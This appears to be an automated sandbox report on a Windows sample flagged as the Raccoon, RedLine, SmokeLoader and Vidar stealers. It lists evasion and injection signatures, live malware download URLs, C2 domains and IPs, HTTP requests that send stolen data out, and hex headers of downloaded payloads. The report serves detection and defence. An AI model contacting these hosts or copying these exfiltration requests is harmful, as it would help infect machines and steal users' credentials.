Windows Analysis Report Md0q201V1D.exe

Overview

General Information

Sample Name: Md0q201V1D.exe
Analysis ID: 511702
MD5: a0bc297d8eaad37f1b145d108786e993
SHA1: ac6858536f64ec7113f1cd10b248430da8510db8
SHA256: b06b803c1a654849e7b0310b0b590ca574568ab9eba41858e8caaff5dbbeacba
Tags: exe, RaccoonStealer

Detection

Raccoon RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Sample uses process hollowing technique
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
PE file does not import any functions
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://xacokuo8.top/ Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
Source: 24.2.B096.exe.4446e20.2.raw.unpack Malware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
Multi AV Scanner detection for domain / URL
Source: http://sysaheu90.top/game.exe Virustotal: Detection: 16%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\CAC5.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\CD17.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\D8D0.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe ReversingLabs: Detection: 42%
Machine Learning detection for sample
Source: Md0q201V1D.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 19.0.21.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.21.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 24.2.B096.exe.653a840.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.653a840.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.5f90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.B096.exe.5f90000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.520563950.0000000006381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.519980779.0000000005F90000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49826 version: TLS 1.0
Uses 32bit PE files
Source: Md0q201V1D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:50078 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:50078 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 2.56.214.190 ports 2,5,6,8,9,59628
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://xacokuo8.top/
Source: Malware configuration extractor URLs: http://hajezey1.top/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/plain; charset=UTF-8
    Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 128
    Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: 194.180.174.181
Source: global traffic HTTP traffic detected: POST /936 HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: 65.108.80.190
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
    Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
    Content-Length: 2068
    Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 65.108.80.190
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /706 HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: 65.108.80.190
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
    Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 5611
    Host: 65.108.80.190
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 118349
    Host: 65.108.80.190
    Connection: Keep-Alive
    Cache-Control: no-cache
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:09:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:09:02 GMTETag: "54a00-5cf7cb1650dd7"Accept-Ranges: bytesContent-Length: 346624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 16 a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 cc 03 00 00 c0 70 02 00 00 00 00 20 cb 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 10 4a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 cf 03 00 64 00 00 00 00 60 73 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bf 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 cb 03 00 00 10 00 00 00 cc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 d0 03 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 c0 2e 70 61 6c 65 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 60 73 02 00 3c 00 00 00 ea 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 a0 73 02 00 24 01 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 12:10:20 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 12:10:03 GMTETag: "92e00-5cf7cb5008bf2"Accept-Ranges: bytesContent-Length: 601600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c0 ec 51 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b0 07 00 00 c0 70 02 00 00 00 00 20 ae 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 7a 4c 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 b2 07 00 64 00 00 00 00 40 77 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 98 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 ae 07 00 00 10 00 00 00 b0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 c0 07 00 00 16 00 00 00 b4 07 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 c0 2e 72 75 78 61 74 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 ca 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 40 77 02 00 3c 00 00 00 ce 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 80 77 02 00 24 01 00 00 0a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:10:52 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
